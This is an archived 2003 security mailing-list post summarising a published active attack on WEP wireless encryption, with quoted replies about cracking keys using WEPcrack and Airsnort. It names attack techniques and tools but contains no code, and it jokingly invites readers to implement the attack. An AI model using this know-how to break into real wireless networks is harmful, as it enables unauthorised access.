From: Ivan Arce (ivan.arce@corest.com)
Date: Fri Jul 18 2003 - 19:09:56 EDT
In the first issue (Jan-feb 2003) of the IEEE Security & Privacy magazine
http://csdl.computer.org/comp/mags/sp/2003/01/j1toc.htm
Nick Petroni and Will Arbaugh provide a quite detailed description of
an active attack against WEP that provides full network access to the
wireless LAN (both encryption and decryption) without knowledge of
the secret key within a few hours. The attack takes advantage of the
use of CRC-32 for packet integrity checks and the availability of
known or easily predictable plainterxt in common network protocols like
DHCP and ICMP.
"The Dangers of Mitigating Security Design Flaws: A Wireless Case Study"
Nick L. Petroni Jr. and William A. Arbaugh
IEEE Security & Privacy magazine, Jan-Feb 2003, pp 28-36
I dont know of any publicly available implementation of this attack but
it is certainly a good starting point for those willing to code it :)
-ivan
--- Perscriptio in manibus tabellariorum est Noli me vocare, ego te vocabo Ivan Arce CTO CORE SECURITY TECHNOLOGIES 46 Farnsworth Street Boston, MA 02210 Ph: 617-399-6980 Fax: 617-399-6987 ivan.arce@coresecurity.com www.coresecurity.com PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A R. DuFresne wrote: > It's been done. But, I think someone erred earlier in the ammount of > traffic one needs to capture to accomplish this. I recall it being > someplace between only 5 and 6 megs of traffic, perhaps 10 if one wished > to make sure, but, I will enjoy any corrections to my recollections. > > Thanks, > > Ron DuFresne > > On Fri, 18 Jul 2003, Calderone, Denis wrote: > > >>A side question for the group on this topic, >> >>Has anybody successfully used WEPcrack or Airsnort to crack a 128bit key? I've never tried. >> >>thanks >> >>Denis Calderone >> --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:37 EDT